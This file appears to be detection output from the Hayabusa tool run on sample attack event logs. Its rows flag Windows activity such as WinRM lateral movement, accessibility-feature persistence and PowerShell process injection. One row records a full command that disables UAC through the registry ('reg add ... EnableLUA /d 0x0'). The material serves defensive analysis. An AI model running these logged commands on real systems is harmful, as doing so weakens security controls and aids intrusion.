2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Evas,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | Process: C:\Windows\System32\winrshost.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x12fe05 | PID: 3948 | PGUID: DFAE8213-BD78-5CDC-0000-0010C7FE1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /C ipconfig | Process: C:\Windows\System32\cmd.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | LID: 0x12fe05 | PID: 3136 | PGUID: DFAE8213-BD78-5CDC-0000-001091041300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: ipconfig | Process: C:\Windows\System32\ipconfig.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\cmd.exe /C ipconfig | LID: 0x12fe05 | PID: 1744 | PGUID: DFAE8213-BD78-5CDC-0000-001074051300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"Lateral Movement - Windows Remote Management | Cmd: ""C:\Windows\system32\HOSTNAME.EXE"" | Process: C:\Windows\System32\HOSTNAME.EXE | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\wsmprovhost.exe -Embedding | LID: 0x15daaf | PID: 2936 | PGUID: DFAE8213-BF0B-5CDC-0000-00105A951600 | Hash: SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,low,Disc,Suspicious Execution of Hostname,,rules/sigma/process_creation/proc_creation_win_susp_hostname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Exec,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/proc_creation_win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
2019-05-16 22:10:13.760 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell CLM Setting Changed | DeleteValue: HKLM\System\CurrentControlSet\Control\SESSION MANAGER\Environment\__PSLockdownPolicy | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3580 | PGUID: DFAE8213-5B49-5CDD-0000-0010EE520500,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Powershell_CLM_Disabled_Sysmon_12.evtx
2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f | Process: C:\Windows\System32\reg.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x585e6 | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | CreateKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,PrivEsc | Evas,Disable UAC Using Registry,,rules/sigma/registry_event/win_re_disable_uac_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
2019-05-17 01:08:30.516 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\LogonUI.exe | PID: 1684 | PGUID: DFAE8213-8AFE-5CDD-0000-001035B90A00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 1720 | PGUID: DFAE8213-8B02-5CDD-0000-00109BCA0A00 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\osk.exe"" | LID: 0x3e7 | PID: 3764 | PGUID: DFAE8213-8B08-5CDD-0000-001011CE0A00 | Hash: SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
2019-05-19 02:16:08.348 +09:00,IEWIN7,10,low,,Process Access,Src Process: 耙甯\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.255 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.333 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.411 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.458 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
